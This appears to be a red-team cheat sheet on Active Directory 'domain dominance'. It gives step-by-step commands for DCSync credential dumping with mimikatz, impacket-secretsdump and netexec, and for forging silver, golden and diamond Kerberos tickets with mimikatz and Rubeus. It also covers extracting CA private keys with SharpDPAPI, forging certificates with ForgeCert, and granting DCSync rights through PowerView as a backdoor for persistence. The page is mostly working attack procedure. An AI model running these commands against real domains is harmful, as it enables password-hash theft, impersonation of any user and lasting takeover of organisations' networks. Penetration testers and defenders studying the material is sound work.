Domain Dominance
1. DCSync
! This requires GetNCChanges which is usually only available to domain admins
DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
The DCSync permission implies having these permissions over the domain itself: DS-Replication-Get-Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set.
By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
We can check who has these permissions using powerview.
- DCSycn w/ Mimikatz
To DCSync only one user
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:{domain} /user:krbtgt
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:{domain} /user:administrator /csv" "exit"
To DCSync all users of the domain
.\mimikatz "lsadump::dcsync /domain:{domain} /all /csv" "exit"
- DCSycn w/ Secretsdump from Impacket
impacket-secretsdump {Domain_Name}/{Username}:{Password}@{IP}
impacket-secretsdump {Domain_Name}/{Username}@{IP} -hashes ':{NTLMHash}'
- DCSycn w/ Crackmapexec
netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds
netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds --users
netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds --users --enabled
netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds vss
- Persisntence
If you are a domain admin, you can grant this permissions to any user with the help of powerview:
Add-ObjectAcl -TargetDistinguishedName "dc=example,dc=domain,dc=com" -PrincipalSamAccountName username -Rights DCSync -Verbose
To check
Get-ObjectAcl -DistinguishedName "dc=example,dc=domain,dc=com" -ResolveGUIDs | ?{$_.IdentityReference -match "username"}
2. Silver Tickets
In a silver ticket attack, the attacker creates a forged Kerberos ticket, which they can then use to authenticate themselves as a user and access the resources and systems that the user is authorized to access. You may forge a TGS for any user to any service on that machine, which is useful for short/medium-term persistence.
Technique | Required Service Tickets |
psexec | CIFS |
winrm | HOST & HTTP |
dcsync (DCs only) | LDAP |
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:{service, for example: cifs/{machine}.{domain}} /aes256:{dumped aes256} /user:{target user} /domain:{domain name} /sid:{SID (whoami)} /nowrap
Then import the ticket (PtT).
3. Golden Tickets
A "golden ticket" is a forged TGT, signed by the domain's krbtgt account. Where a silver ticket can be used to impersonate any user, it's limited to either that single service or to any service but on a single machine. A golden ticket can be used to impersonate any user, to any service, on any machine in the domain. Credentials are never changed automatically. For that reason, the krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently).
- With Mimikatz
privilege::debug
lsadump::lsa /inject /name:krbtgt
lsadump::lsa /patch
lsadump::trust /patch
lsadump::dcsync /user:krbtgt
Then we need to take the krbtg hash, locate the domain SID (PowerView) and restart mimikatz:
privilege::debug
kerberos::purge
kerberos::golden /user:fakeuser /domain:{domain name} /sid:{domain SID} /rc4:{krbtg hash} /ptt
Alternatively we can use ticketer.
Then to use the ticket in Linux:
misc::convert ccache ticket.kirbi
export KRB5CCNAME=/home/user/ticket.ccache
cat $KRB5CCNAME
Then to connect:
./psexec.py -k -no-pass -dc-ip {ip} {domain}/administrator@{ip}
To swap ticket between Windows and Linux:
ticket_converter.py velociraptor.ccache velociraptor.kirbi
ticket_converter.py velociraptor.kirbi velociraptor.ccache
- With Rubeus
Once we have krbtgt hash (for example from a dcsync); To locate the domain sid go to PowerView:
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:{krbtg aes256 hash} /user:{target user} /domain:{domain} /sid:{domain} /nowrap
Then we can PtT.
4. Diamond Tickets
Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash.
Therefore, a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ. A "diamond ticket" is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQs will have a preceding AS-REQ.
First, we prove we have no access to the DC. Example:
ls \\dc-2.dev.cyberbotic.io\c$
Then, we create it with Rubeus (To locate the RID go to PowerView):
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:{username of the user to impersonate (domain admin)} /ticketuserid:{domain RID of that user} /groups:512 /krbkey:{krbtgt AES256 hash} /nowrap
Rubeus describe will now show that this is a TGT for the target user:
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:{ticket}
Then with that ticket we can PtT.
5. Forged Certificates
Gaining local admin access to a CA allows an attacker to extract the CA private key, which can be used to sign a forged certificate. The default validity period for a CA private key is 5 years, but this can be set to any value during setup, sometimes as high as 10+ years.
Once on a CA, SharpDPAPI (https://github.com/GhostPack/SharpDPAPI) can extract the private keys:
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine
Then we need to save the private key and certificate to a .pem file and convert it to a .pfx with openssl (Procedure in Certificate Services/Misconfigured Certificate Templates).
Then, build the forged certificate with ForgeCert (https://github.com/GhostPack/ForgeCert). Example:
C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123
Even though you can specify any SubjectAltName, the user does need to be present in AD. We can now use Rubeus to request a legitimate TGT with this forged certificate:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap
Then we can do PtT. We can combine this with the S4U2self trick to gain access to any machine or service in the domain.
Last updated